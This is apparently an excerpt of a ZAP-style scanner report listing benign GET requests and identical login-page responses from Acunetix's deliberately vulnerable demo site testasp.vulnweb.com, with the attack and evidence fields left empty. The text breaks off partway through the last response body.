Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 522 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:12 GMT Content-Length: 3234 |
Response Body - size: 3,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3137 |
Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 369 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 3132 |
Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 506 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:03:23 GMT Content-Length: 3218 |
Response Body - size: 3,218 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table 